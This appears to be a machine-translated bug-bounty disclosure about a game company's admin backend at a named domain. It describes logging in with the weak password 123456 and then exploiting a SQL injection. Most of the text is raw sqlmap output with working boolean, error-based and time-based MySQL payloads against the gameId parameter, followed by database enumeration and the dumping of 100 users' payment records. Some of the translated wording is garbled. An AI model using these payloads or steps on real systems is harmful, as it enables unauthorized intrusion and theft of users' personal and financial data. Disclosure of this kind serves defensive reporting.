Hero mutual entertainment weak passwords in SQL injection at the background of a website (the number of game user data involved in a gun battle is unknown)
Take the small vendor-before getshell, It would be 2 rank AH (some of the information is also expected to be the administrator code ~)
There is a weak password when cracking the http://idk.yingxiong.com/
Mask Region
[email protected]*****[email protected]*****[email protected]**********ngxion**********yingxi**********ingxio**********xiong**********gxiong**********yingxi*****[email protected]*****
The password is 123456.
Then we found some background statistics ~ Try to see if there is any injection.
http://idk.yingxiong.com:80/players/retained?gameId=131&type=0&begintime=2015%2F10%2F13&endtime=2016%2F01%2F11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1 (GET)
sqlmap identified the following injection points with a total of 71 HTTP(s) requests:---Parameter: gameId (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: gameId=131 AND 1182=1182-- wnlV&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: gameId=131 AND (SELECT 8411 FROM(SELECT COUNT(*),CONCAT(0x71706a7071,(SELECT (ELT(8411=8411,1))),0x716b6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- XyAs&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: gameId=131 AND (SELECT * FROM (SELECT(SLEEP(5)))OZKq)-- gFhL&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1---back-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: gameId (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: gameId=131 AND 1182=1182-- wnlV&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: gameId=131 AND (SELECT 8411 FROM(SELECT COUNT(*),CONCAT(0x71706a7071,(SELECT (ELT(8411=8411,1))),0x716b6a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- XyAs&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: gameId=131 AND (SELECT * FROM (SELECT(SLEEP(5)))OZKq)-- gFhL&type=0&begintime=2015/10/13&endtime=2016/01/11&channelID=0&gameRegionID=0&sort=desc&field=datetime&page=1---back-end DBMS: MySQL 5.0available databases [10]:
Mask Region
***** i**********tion_s********** k**********uxi**********ysq**********ance_s**********ngzh********** s**********tat********** t*****
The qiangzhan database contains many non-table names.
Mask Region
*****gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201**********gin_201********** *****
Inject a part of data randomly.
Let's take a look at user_pay. the user's recharge record is randomly selected for 100 entries.